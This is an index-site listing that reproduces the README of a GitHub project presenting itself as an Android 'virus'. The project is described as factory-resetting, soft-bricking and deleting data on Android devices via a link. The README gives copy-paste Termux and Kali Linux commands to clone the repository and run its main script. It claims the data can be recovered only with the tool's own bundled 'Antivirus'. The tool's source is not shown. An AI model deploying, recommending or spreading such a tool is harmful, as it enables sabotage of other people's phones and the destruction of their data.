Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/krishealty/ducky-virus

Android shell virus that will reset, brick and corrupt the Android device with a link, also contains Antivirus and now supports Android 10+
https://github.com/krishealty/ducky-virus

android android-virus android-virus-application bash-script exploitation factory-reset hacking hacking-tool hacking-tools kali-linux kali-scripts shell-script termux termux-hacking termux-tool virus

Last synced: 3 months ago
JSON representation

Android shell virus that will reset, brick and corrupt the Android device with a link, also contains Antivirus and now supports Android 10+

Awesome Lists containing this project

README

        

##

Ducky virus



## About
Simple Bash script program to Factory reset and soft Brick an Android device (Supports Android 10+), however, the data can be recovered ONLY by the Antivirus provided in the program itself.

## Features
* Factory Reset
* Soft brick
* Software reset
* Data Deletion (recoverable)

###

Deploy in Termux
***

```bash
pkg update && pkg upgrade -y
```
```bash
pkg install git -y
```
```bash
pkg install lolcat
```
```bash
git clone https://github.com/krishealty/ducky-virus
```
```bash
cd $HOME
```
```bash
cd ducky-virus
```
```bash
ls
```
```bash
bash main.sh
```

###

Deploy in Kali Linux
***
```bash
sudo apt-get update && pkg upgrade -y
```
```bash
sudo apt-get install git -y
```
```bash
git clone https://github.com/krishealty/ducky-virus
```
```bash
cd ducky-virus
```
```bash
bash main.sh
```

## ScreenShots :-
![Screenshot_20220613-103741_zoom](https://user-images.githubusercontent.com/70594016/173283913-54b6a34b-e3e8-4d9e-a906-56dc08ffc44e.png)